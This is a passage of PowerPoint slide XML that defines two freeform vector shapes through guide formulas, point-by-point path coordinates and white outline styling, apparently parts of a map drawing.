                  <a:gd name="T75" fmla="*/ 27 h 55"/>
                  <a:gd name="T76" fmla="*/ 92 w 167"/>
                  <a:gd name="T77" fmla="*/ 26 h 55"/>
                  <a:gd name="T78" fmla="*/ 79 w 167"/>
                  <a:gd name="T79" fmla="*/ 25 h 55"/>
                  <a:gd name="T80" fmla="*/ 68 w 167"/>
                  <a:gd name="T81" fmla="*/ 19 h 55"/>
                  <a:gd name="T82" fmla="*/ 58 w 167"/>
                  <a:gd name="T83" fmla="*/ 17 h 55"/>
                  <a:gd name="T84" fmla="*/ 46 w 167"/>
                  <a:gd name="T85" fmla="*/ 16 h 55"/>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67"/>
                  <a:gd name="T130" fmla="*/ 0 h 55"/>
                  <a:gd name="T131" fmla="*/ 167 w 167"/>
                  <a:gd name="T132" fmla="*/ 55 h 55"/>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67" h="55">
                    <a:moveTo>
                      <a:pt x="40" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="42" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36192" name="Freeform 325"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="880" y="2396"/>
                <a:ext cx="480" cy="315"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 307 w 480"/>
                  <a:gd name="T1" fmla="*/ 167 h 315"/>
                  <a:gd name="T2" fmla="*/ 322 w 480"/>
                  <a:gd name="T3" fmla="*/ 218 h 315"/>
                  <a:gd name="T4" fmla="*/ 343 w 480"/>
                  <a:gd name="T5" fmla="*/ 245 h 315"/>
                  <a:gd name="T6" fmla="*/ 371 w 480"/>
                  <a:gd name="T7" fmla="*/ 252 h 315"/>
                  <a:gd name="T8" fmla="*/ 406 w 480"/>
                  <a:gd name="T9" fmla="*/ 249 h 315"/>
                  <a:gd name="T10" fmla="*/ 417 w 480"/>
                  <a:gd name="T11" fmla="*/ 228 h 315"/>
                  <a:gd name="T12" fmla="*/ 428 w 480"/>
                  <a:gd name="T13" fmla="*/ 205 h 315"/>
                  <a:gd name="T14" fmla="*/ 461 w 480"/>
                  <a:gd name="T15" fmla="*/ 198 h 315"/>
                  <a:gd name="T16" fmla="*/ 480 w 480"/>
                  <a:gd name="T17" fmla="*/ 208 h 315"/>
                  <a:gd name="T18" fmla="*/ 466 w 480"/>
                  <a:gd name="T19" fmla="*/ 229 h 315"/>
                  <a:gd name="T20" fmla="*/ 465 w 480"/>
                  <a:gd name="T21" fmla="*/ 250 h 315"/>
                  <a:gd name="T22" fmla="*/ 458 w 480"/>
                  <a:gd name="T23" fmla="*/ 249 h 315"/>
                  <a:gd name="T24" fmla="*/ 444 w 480"/>
                  <a:gd name="T25" fmla="*/ 261 h 315"/>
                  <a:gd name="T26" fmla="*/ 414 w 480"/>
                  <a:gd name="T27" fmla="*/ 276 h 315"/>
                  <a:gd name="T28" fmla="*/ 403 w 480"/>
                  <a:gd name="T29" fmla="*/ 289 h 315"/>
                  <a:gd name="T30" fmla="*/ 392 w 480"/>
                  <a:gd name="T31" fmla="*/ 311 h 315"/>
                  <a:gd name="T32" fmla="*/ 362 w 480"/>
                  <a:gd name="T33" fmla="*/ 287 h 315"/>
                  <a:gd name="T34" fmla="*/ 324 w 480"/>
                  <a:gd name="T35" fmla="*/ 294 h 315"/>
                  <a:gd name="T36" fmla="*/ 290 w 480"/>
                  <a:gd name="T37" fmla="*/ 281 h 315"/>
                  <a:gd name="T38" fmla="*/ 249 w 480"/>
                  <a:gd name="T39" fmla="*/ 265 h 315"/>
                  <a:gd name="T40" fmla="*/ 213 w 480"/>
                  <a:gd name="T41" fmla="*/ 248 h 315"/>
                  <a:gd name="T42" fmla="*/ 185 w 480"/>
                  <a:gd name="T43" fmla="*/ 222 h 315"/>
                  <a:gd name="T44" fmla="*/ 188 w 480"/>
                  <a:gd name="T45" fmla="*/ 213 h 315"/>
                  <a:gd name="T46" fmla="*/ 184 w 480"/>
                  <a:gd name="T47" fmla="*/ 189 h 315"/>
                  <a:gd name="T48" fmla="*/ 158 w 480"/>
                  <a:gd name="T49" fmla="*/ 155 h 315"/>
                  <a:gd name="T50" fmla="*/ 144 w 480"/>
                  <a:gd name="T51" fmla="*/ 137 h 315"/>
                  <a:gd name="T52" fmla="*/ 127 w 480"/>
                  <a:gd name="T53" fmla="*/ 128 h 315"/>
                  <a:gd name="T54" fmla="*/ 121 w 480"/>
                  <a:gd name="T55" fmla="*/ 108 h 315"/>
                  <a:gd name="T56" fmla="*/ 105 w 480"/>
                  <a:gd name="T57" fmla="*/ 97 h 315"/>
                  <a:gd name="T58" fmla="*/ 97 w 480"/>
                  <a:gd name="T59" fmla="*/ 85 h 315"/>
                  <a:gd name="T60" fmla="*/ 72 w 480"/>
                  <a:gd name="T61" fmla="*/ 51 h 315"/>
                  <a:gd name="T62" fmla="*/ 65 w 480"/>
                  <a:gd name="T63" fmla="*/ 28 h 315"/>
                  <a:gd name="T64" fmla="*/ 49 w 480"/>
                  <a:gd name="T65" fmla="*/ 21 h 315"/>
                  <a:gd name="T66" fmla="*/ 37 w 480"/>
                  <a:gd name="T67" fmla="*/ 31 h 315"/>
                  <a:gd name="T68" fmla="*/ 49 w 480"/>
                  <a:gd name="T69" fmla="*/ 56 h 315"/>
                  <a:gd name="T70" fmla="*/ 68 w 480"/>
                  <a:gd name="T71" fmla="*/ 79 h 315"/>
                  <a:gd name="T72" fmla="*/ 79 w 480"/>
                  <a:gd name="T73" fmla="*/ 98 h 315"/>
                  <a:gd name="T74" fmla="*/ 93 w 480"/>
                  <a:gd name="T75" fmla="*/ 123 h 315"/>
                  <a:gd name="T76" fmla="*/ 106 w 480"/>
                  <a:gd name="T77" fmla="*/ 153 h 315"/>
                  <a:gd name="T78" fmla="*/ 122 w 480"/>
                  <a:gd name="T79" fmla="*/ 163 h 315"/>
                  <a:gd name="T80" fmla="*/ 112 w 480"/>
                  <a:gd name="T81" fmla="*/ 172 h 315"/>
                  <a:gd name="T82" fmla="*/ 83 w 480"/>
                  <a:gd name="T83" fmla="*/ 144 h 315"/>
                  <a:gd name="T84" fmla="*/ 75 w 480"/>
                  <a:gd name="T85" fmla="*/ 118 h 315"/>
                  <a:gd name="T86" fmla="*/ 57 w 480"/>
                  <a:gd name="T87" fmla="*/ 107 h 315"/>
                  <a:gd name="T88" fmla="*/ 38 w 480"/>
                  <a:gd name="T89" fmla="*/ 89 h 315"/>
                  <a:gd name="T90" fmla="*/ 46 w 480"/>
                  <a:gd name="T91" fmla="*/ 73 h 315"/>
                  <a:gd name="T92" fmla="*/ 21 w 480"/>
                  <a:gd name="T93" fmla="*/ 45 h 315"/>
                  <a:gd name="T94" fmla="*/ 10 w 480"/>
                  <a:gd name="T95" fmla="*/ 26 h 315"/>
                  <a:gd name="T96" fmla="*/ 0 w 480"/>
                  <a:gd name="T97" fmla="*/ 2 h 315"/>
                  <a:gd name="T98" fmla="*/ 49 w 480"/>
                  <a:gd name="T99" fmla="*/ 7 h 315"/>
                  <a:gd name="T100" fmla="*/ 126 w 480"/>
                  <a:gd name="T101" fmla="*/ 26 h 315"/>
                  <a:gd name="T102" fmla="*/ 170 w 480"/>
                  <a:gd name="T103" fmla="*/ 19 h 315"/>
                  <a:gd name="T104" fmla="*/ 194 w 480"/>
                  <a:gd name="T105" fmla="*/ 45 h 315"/>
                  <a:gd name="T106" fmla="*/ 222 w 480"/>
                  <a:gd name="T107" fmla="*/ 67 h 315"/>
                  <a:gd name="T108" fmla="*/ 241 w 480"/>
                  <a:gd name="T109" fmla="*/ 53 h 315"/>
                  <a:gd name="T110" fmla="*/ 266 w 480"/>
                  <a:gd name="T111" fmla="*/ 80 h 315"/>
                  <a:gd name="T112" fmla="*/ 284 w 480"/>
                  <a:gd name="T113" fmla="*/ 111 h 315"/>
                  <a:gd name="T114" fmla="*/ 307 w 480"/>
                  <a:gd name="T115" fmla="*/ 120 h 315"/>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480"/>
                  <a:gd name="T175" fmla="*/ 0 h 315"/>
                  <a:gd name="T176" fmla="*/ 480 w 480"/>
                  <a:gd name="T177" fmla="*/ 315 h 315"/>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480" h="315">
                    <a:moveTo>
                      <a:pt x="316" y="124"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="313" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="85"/>
